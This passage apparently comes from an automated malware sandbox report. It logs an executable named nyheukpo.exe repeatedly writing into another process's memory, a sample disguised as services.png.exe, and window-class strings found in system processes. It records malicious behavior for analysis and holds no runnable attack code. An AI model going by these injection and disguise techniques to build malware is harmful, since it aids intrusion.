                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 390000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D20000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D61778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D6178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D61BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D61BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24E0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2521778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 252178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2521BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2521BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2510000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2551778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 255178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2551BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2551BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2550000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2591778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 259178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2591BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2591BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2460000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29F0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A31778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A3178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A31BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A31BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2090000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20D1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20D178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20D1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20D1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20A0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20E1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20E178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20E1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20E1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C90000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26A0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26E1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26E178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26E1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26E1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E00000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E41778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E4178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E41BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E41BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2280000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 22C1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 22C178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 22C1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 22C1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26B0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26F1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26F178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26F1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26F1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CC0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D01778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D0178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D01BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D01BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3090000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 30D1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 30D178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 30D1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 30D1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: FE0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1021778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 102178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1021BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1021BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2980000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29C1778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29C178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29C1BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29C1BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EC0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F01778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F0178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F01BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F01BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2DF0000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E31778Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E3178CJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E31BF0Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E31BF4Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_004364CE InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,GetSecurityDescriptorDacl,SetSecurityDescriptorDacl,LocalFree,0_2_004364CE
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00436777 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00436777
                        Source: sihost.exe, 00000002.00000002.2969522349.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000002.00000000.1730947021.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000003.00000000.1732811941.00000151A5060000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: sihost.exe, 00000002.00000002.2969522349.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000002.00000000.1730947021.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000003.00000000.1732811941.00000151A5060000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                        Source: ctfmon.exe, 00000005.00000000.1737537430.000001F288C93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd"
                        Source: explorer.exe, 00000006.00000000.1740112568.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2933946089.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                        Source: sihost.exe, 00000002.00000002.2969522349.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000002.00000000.1730947021.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000003.00000000.1732811941.00000151A5060000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                        Source: ctfmon.exe, 00000005.00000000.1737537430.000001F288C93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndH
                        Source: sihost.exe, 00000002.00000002.2969522349.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000002.00000000.1730947021.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000003.00000000.1732811941.00000151A5060000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager

                        Language, Device and Operating System Detection

                        barindex
